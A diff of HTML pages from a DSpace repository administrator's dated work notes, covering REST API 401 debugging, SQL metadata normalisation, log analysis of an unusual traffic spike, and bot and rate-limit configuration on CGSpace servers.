<ul>
@ -1108,7 +1108,7 @@ dspace.log.2019-04-20:1515
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -f -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;:&quot;cg.subject.cpwf&quot;, &quot;value&quot;:&quot;WATER MANAGEMENT&quot;,&quot;language&quot;: &quot;en_US&quot;}'
<pre tabindex="0"><code>$ curl -f -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: &#34;en_US&#34;}&#39;
curl: (22) The requested URL returned error: 401
</code></pre><ul>
<li>Note that curl only shows the HTTP 401 error if you use <code>-f</code> (fail), and only then if you <em>don&rsquo;t</em> include <code>-s</code>
@ -1118,19 +1118,19 @@ curl: (22) The requested URL returned error: 401
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang='en_US';
<pre tabindex="0"><code>dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value=&#39;WATER MANAGEMENT&#39; AND text_lang=&#39;en_US&#39;;
count
-------
376
(1 row)
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang='';
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value=&#39;WATER MANAGEMENT&#39; AND text_lang=&#39;&#39;;
count
-------
149
(1 row)
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang IS NULL;
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value=&#39;WATER MANAGEMENT&#39; AND text_lang IS NULL;
count
-------
417
@ -1146,20 +1146,20 @@ dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AN
</code></pre><ul>
<li>Nevertheless, if I request using the <code>null</code> language I get 1020 results, plus 179 for a blank language attribute:</li>
</ul>
<pre tabindex="0"><code>$ curl -s -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;:&quot;cg.subject.cpwf&quot;, &quot;value&quot;:&quot;WATER MANAGEMENT&quot;,&quot;language&quot;: null}' | jq length
<pre tabindex="0"><code>$ curl -s -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: null}&#39; | jq length
1020
$ curl -s -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;:&quot;cg.subject.cpwf&quot;, &quot;value&quot;:&quot;WATER MANAGEMENT&quot;,&quot;language&quot;: &quot;&quot;}' | jq length
$ curl -s -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: &#34;&#34;}&#39; | jq length
179
</code></pre><ul>
<li>This is weird because I see 942–1156 items with &ldquo;WATER MANAGEMENT&rdquo; (depending on wildcard matching for errors in subject spelling):</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT';
<pre tabindex="0"><code>dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value=&#39;WATER MANAGEMENT&#39;;
count
-------
942
(1 row)
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value LIKE '%WATER MANAGEMENT%';
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value LIKE &#39;%WATER MANAGEMENT%&#39;;
count
-------
1156
@ -1177,13 +1177,13 @@ dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AN
</li>
<li>I tested the REST API after logging in with my super admin account and I was able to get results for the problematic query:</li>
</ul>
<pre tabindex="0"><code>$ curl -f -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/login&quot; -d '{&quot;email&quot;:&quot;example@me.com&quot;,&quot;password&quot;:&quot;fuuuuu&quot;}'
$ curl -f -H &quot;Content-Type: application/json&quot; -H &quot;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&quot; -X GET &quot;https://dspacetest.cgiar.org/rest/status&quot;
$ curl -f -H &quot;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;:&quot;cg.subject.cpwf&quot;, &quot;value&quot;:&quot;WATER MANAGEMENT&quot;,&quot;language&quot;: &quot;en_US&quot;}'
<pre tabindex="0"><code>$ curl -f -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/login&#34; -d &#39;{&#34;email&#34;:&#34;example@me.com&#34;,&#34;password&#34;:&#34;fuuuuu&#34;}&#39;
$ curl -f -H &#34;Content-Type: application/json&#34; -H &#34;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&#34; -X GET &#34;https://dspacetest.cgiar.org/rest/status&#34;
$ curl -f -H &#34;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: &#34;en_US&#34;}&#39;
</code></pre><ul>
<li>I created a normal user for Carlos to try as an unprivileged user:</li>
</ul>
<pre tabindex="0"><code>$ dspace user --add --givenname Carlos --surname Tejo --email blah@blah.com --password 'ddmmdd'
<pre tabindex="0"><code>$ dspace user --add --givenname Carlos --surname Tejo --email blah@blah.com --password &#39;ddmmdd&#39;
</code></pre><ul>
<li>But still I get the HTTP 401 and I have no idea which item is causing it</li>
<li>I enabled more verbose logging in <code>ItemsResource.java</code> and now I can at least see the item ID that causes the failure&hellip;
@ -1212,7 +1212,7 @@ $ curl -f -H &quot;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&quot;
<ul>
<li>Export a list of authors for Peter to look through:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-04-26-all-authors.csv with csv header;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-04-26-all-authors.csv with csv header;
COPY 65752
</code></pre><h2 id="2019-04-28">2019-04-28</h2>
<ul>
@ -1262,11 +1262,11 @@ COPY 65752
spa | 2
| 1074345
(11 rows)
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;ethnob&#39;, &#39;en&#39;, &#39;*&#39;, &#39;E.&#39;, &#39;&#39;);
UPDATE 360295
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
UPDATE 1074345
dspace=# UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
dspace=# UPDATE metadatavalue SET text_lang=&#39;es_ES&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;es&#39;, &#39;spa&#39;);
UPDATE 14
</code></pre><ul>
<li>Then I exported the whole repository as CSV, imported it into OpenRefine, removed a few unneeded columns, exported it, zipped it down to 36MB, and emailed a link to Carlos</li>

View File

@ -48,7 +48,7 @@ DELETE 1
But after this I tried to delete the item from the XMLUI and it is still present&hellip;
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -168,7 +168,7 @@ dspace=# DELETE FROM item WHERE item_id=74648;
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -f -H &quot;Content-Type: application/json&quot; -X POST &quot;http://localhost:8080/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;:&quot;cg.subject.cpwf&quot;, &quot;value&quot;:&quot;WATER MANAGEMENT&quot;,&quot;language&quot;: &quot;en_US&quot;}'
<pre tabindex="0"><code>$ curl -f -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: &#34;en_US&#34;}&#39;
curl: (22) The requested URL returned error: 401 Unauthorized
</code></pre><ul>
<li>The DSpace log shows the item ID (because I modified the error text):</li>
@ -282,52 +282,52 @@ Please see the DSpace documentation for assistance.
<ul>
<li>The number of unique sessions today is <em>ridiculously</em> high compared to the last few days considering it&rsquo;s only 12:30PM right now:</li>
</ul>
<pre tabindex="0"><code>$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-06 | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-06 | sort | uniq | wc -l
101108
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-05 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-05 | sort | uniq | wc -l
14618
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-04 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-04 | sort | uniq | wc -l
14946
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-03 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-03 | sort | uniq | wc -l
6410
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-02 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-02 | sort | uniq | wc -l
7758
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-01 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-01 | sort | uniq | wc -l
20528
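# the same counts as a loop (a convenience sketch):
$ for log in dspace.log.2019-05-0{1..6}; do echo -n &#34;$log: &#34;; grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; &#34;$log&#34; | sort -u | wc -l; done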
</code></pre><ul>
<li>The number of unique IP addresses from 2 to 6 AM this morning is already several times higher than the average for that time of the morning this past week:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
7127
# zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E '05/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E &#39;05/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1231
# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '04/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E &#39;04/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1255
# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E '03/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E &#39;03/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1736
# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E '02/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E &#39;02/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1573
# zcat --force /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.6.gz | grep -E '01/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.6.gz | grep -E &#39;01/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1410
</code></pre><ul>
<li>Just this morning between the hours of 2 and 6 the number of unique sessions was <em>very</em> high compared to previous mornings:</li>
</ul>
<pre tabindex="0"><code>$ cat dspace.log.2019-05-06 | grep -E '2019-05-06 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2019-05-06 | grep -E &#39;2019-05-06 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
83650
$ cat dspace.log.2019-05-05 | grep -E '2019-05-05 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-05 | grep -E &#39;2019-05-05 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2547
$ cat dspace.log.2019-05-04 | grep -E '2019-05-04 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-04 | grep -E &#39;2019-05-04 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2574
$ cat dspace.log.2019-05-03 | grep -E '2019-05-03 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-03 | grep -E &#39;2019-05-03 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2911
$ cat dspace.log.2019-05-02 | grep -E '2019-05-02 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-02 | grep -E &#39;2019-05-02 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2704
$ cat dspace.log.2019-05-01 | grep -E '2019-05-01 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-01 | grep -E &#39;2019-05-01 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
3699
</code></pre><ul>
<li>Most of the requests were GETs:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E &quot;(GET|HEAD|POST|PUT)&quot; | sort | uniq -c | sort -n
<pre tabindex="0"><code># cat /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | grep -o -E &#34;(GET|HEAD|POST|PUT)&#34; | sort | uniq -c | sort -n
1 PUT
98 POST
2845 HEAD
@ -336,19 +336,19 @@ $ cat dspace.log.2019-05-01 | grep -E '2019-05-01 (02|03|04|05|06):' | grep -o -
<li>I&rsquo;m not exactly sure what happened this morning, but it looks like some legitimate user traffic—perhaps someone launched a new publication and it got a bunch of hits?</li>
<li>Looking again, I see 84,000 requests to <code>/handle</code> this morning (not including logs for library.cgiar.org because those get HTTP 301 redirect to CGSpace and appear here in <code>access.log</code>):</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -c -o -E &quot; /handle/[0-9]+/[0-9]+&quot;
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | grep -c -o -E &#34; /handle/[0-9]+/[0-9]+&#34;
84350
</code></pre><ul>
<li>But it would be difficult to find a pattern for those requests because they cover 78,000 <em>unique</em> Handles (ie direct browsing of items, collections, or communities) and only 2,492 discover/browse (total, not unique):</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E &quot; /handle/[0-9]+/[0-9]+ HTTP&quot; | sort | uniq | wc -l
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | grep -o -E &#34; /handle/[0-9]+/[0-9]+ HTTP&#34; | sort | uniq | wc -l
78104
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E &quot; /handle/[0-9]+/[0-9]+/(discover|browse)&quot; | wc -l
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | grep -o -E &#34; /handle/[0-9]+/[0-9]+/(discover|browse)&#34; | wc -l
2492
</code></pre><ul>
<li>In other news, I see some IP is making several requests per second to the exact same REST API endpoints, for example:</li>
</ul>
<pre tabindex="0"><code># grep /rest/handle/10568/3703?expand=all rest.log | awk '{print $1}' | sort | uniq -c
<pre tabindex="0"><code># grep /rest/handle/10568/3703?expand=all rest.log | awk &#39;{print $1}&#39; | sort | uniq -c
3 2a01:7e00::f03c:91ff:fe0a:d645
113 63.32.242.35
</code></pre><ul>
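<li>If that continues, nginx&#39;s limit_req would be one way to slow such clients down; a minimal sketch (the zone name, size, and rate are illustrative):</li>
</ul>
<pre tabindex="0"><code># in the http {} block:
limit_req_zone $binary_remote_addr zone=rest:10m rate=5r/s;

# in the server {} block:
location /rest {
    limit_req zone=rest burst=10 nodelay;
}
</code></pre>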
@ -363,28 +363,28 @@ $ cat dspace.log.2019-05-01 | grep -E '2019-05-01 (02|03|04|05|06):' | grep -o -
<ul>
<li>The total number of unique IPs on CGSpace yesterday was almost 14,000, which is several thousand higher than previous day totals:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E '06/May/2019' | awk '{print $1}' | sort | uniq | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E &#39;06/May/2019&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
13969
# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '05/May/2019' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E &#39;05/May/2019&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
5936
# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E '04/May/2019' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E &#39;04/May/2019&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
6229
# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E '03/May/2019' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E &#39;03/May/2019&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
8051
</code></pre><ul>
<li>Total number of sessions yesterday was <em>much</em> higher compared to days last week:</li>
</ul>
<pre tabindex="0"><code>$ cat dspace.log.2019-05-06 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2019-05-06 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
144160
$ cat dspace.log.2019-05-05 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-05 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
57269
$ cat dspace.log.2019-05-04 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-04 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
58648
$ cat dspace.log.2019-05-03 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-03 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
27883
$ cat dspace.log.2019-05-02 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-02 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
26996
$ cat dspace.log.2019-05-01 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-01 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
61866
</code></pre><ul>
<li>The usage statistics seem to agree that yesterday was crazy:</li>
@ -423,9 +423,9 @@ Please see the DSpace documentation for assistance.
<li>Help Moayad with certbot-auto for Let&rsquo;s Encrypt scripts on the new AReS server (linode20)</li>
<li>Normalize all <code>text_lang</code> values for metadata on CGSpace and DSpace Test (as I had tested last month):</li>
</ul>
<pre tabindex="0"><code>UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
<pre tabindex="0"><code>UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;ethnob&#39;, &#39;en&#39;, &#39;*&#39;, &#39;E.&#39;, &#39;&#39;);
UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
UPDATE metadatavalue SET text_lang=&#39;es_ES&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;es&#39;, &#39;spa&#39;);
</code></pre><ul>
<li>Send Francesca Giampieri from Bioversity a CSV export of all their items issued in 2018
<ul>
@ -454,7 +454,7 @@ UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata
</li>
<li>All of the IPs from these networks are using generic user agents like this one, though there are MANY more, and they change frequently:</li>
</ul>
<pre tabindex="0"><code>&quot;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2703.0 Safari/537.36&quot;
<pre tabindex="0"><code>&#34;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2703.0 Safari/537.36&#34;
</code></pre><ul>
<li>I found a <a href="https://www.qurium.org/alerts/azerbaijan/azerbaijan-and-the-region40-ddos-service/">blog post from 2018 detailing an attack from a DDoS service</a> that matches our pattern exactly</li>
<li>They specifically mention:</li>
@ -473,7 +473,7 @@ UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata
<ul>
<li>I see that the Unpaywall bot is responsible for a few thousand XMLUI sessions every day (IP addresses come from nginx access.log):</li>
</ul>
<pre tabindex="0"><code>$ cat dspace.log.2019-05-11 | grep -E 'ip_addr=(100.26.206.188|100.27.19.233|107.22.98.199|174.129.156.41|18.205.243.110|18.205.245.200|18.207.176.164|18.207.209.186|18.212.126.89|18.212.5.59|18.213.4.150|18.232.120.6|18.234.180.224|18.234.81.13|3.208.23.222|34.201.121.183|34.201.241.214|34.201.39.122|34.203.188.39|34.207.197.154|34.207.232.63|34.207.91.147|34.224.86.47|34.227.205.181|34.228.220.218|34.229.223.120|35.171.160.166|35.175.175.202|3.80.201.39|3.81.120.70|3.81.43.53|3.84.152.19|3.85.113.253|3.85.237.139|3.85.56.100|3.87.23.95|3.87.248.240|3.87.250.3|3.87.62.129|3.88.13.9|3.88.57.237|3.89.71.15|3.90.17.242|3.90.68.247|3.91.44.91|3.92.138.47|3.94.250.180|52.200.78.128|52.201.223.200|52.90.114.186|52.90.48.73|54.145.91.243|54.160.246.228|54.165.66.180|54.166.219.216|54.166.238.172|54.167.89.152|54.174.94.223|54.196.18.211|54.198.234.175|54.208.8.172|54.224.146.147|54.234.169.91|54.235.29.216|54.237.196.147|54.242.68.231|54.82.6.96|54.87.12.181|54.89.217.141|54.89.234.182|54.90.81.216|54.91.104.162)' | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2019-05-11 | grep -E &#39;ip_addr=(100.26.206.188|100.27.19.233|107.22.98.199|174.129.156.41|18.205.243.110|18.205.245.200|18.207.176.164|18.207.209.186|18.212.126.89|18.212.5.59|18.213.4.150|18.232.120.6|18.234.180.224|18.234.81.13|3.208.23.222|34.201.121.183|34.201.241.214|34.201.39.122|34.203.188.39|34.207.197.154|34.207.232.63|34.207.91.147|34.224.86.47|34.227.205.181|34.228.220.218|34.229.223.120|35.171.160.166|35.175.175.202|3.80.201.39|3.81.120.70|3.81.43.53|3.84.152.19|3.85.113.253|3.85.237.139|3.85.56.100|3.87.23.95|3.87.248.240|3.87.250.3|3.87.62.129|3.88.13.9|3.88.57.237|3.89.71.15|3.90.17.242|3.90.68.247|3.91.44.91|3.92.138.47|3.94.250.180|52.200.78.128|52.201.223.200|52.90.114.186|52.90.48.73|54.145.91.243|54.160.246.228|54.165.66.180|54.166.219.216|54.166.238.172|54.167.89.152|54.174.94.223|54.196.18.211|54.198.234.175|54.208.8.172|54.224.146.147|54.234.169.91|54.235.29.216|54.237.196.147|54.242.68.231|54.82.6.96|54.87.12.181|54.89.217.141|54.89.234.182|54.90.81.216|54.91.104.162)&#39; | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2206
</code></pre><ul>
<li>I added &ldquo;Unpaywall&rdquo; to the list of bots in the Tomcat Crawler Session Manager Valve</li>
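<li>For reference, that Valve lives in Tomcat&#39;s server.xml and looks roughly like this (the user-agent regex here is illustrative):</li>
</ul>
<pre tabindex="0"><code>&lt;Valve className=&#34;org.apache.catalina.valves.CrawlerSessionManagerValve&#34;
       crawlerUserAgents=&#34;.*[bB]ot.*|.*Yahoo! Slurp.*|.*Unpaywall.*&#34; /&gt;
</code></pre>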
@ -519,20 +519,20 @@ COPY 995
<li>Peter sent me a bunch of fixes for investors from yesterday</li>
<li>I did a quick check in Open Refine (trim and collapse whitespace, clean smart quotes, etc) and then applied them on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-05-16-fix-306-Investors.csv -db dspace-u dspace-p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-05-16-delete-297-Investors.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-05-16-fix-306-Investors.csv -db dspace-u dspace-p &#39;fuuu&#39; -f dc.description.sponsorship -m 29 -t correct -d
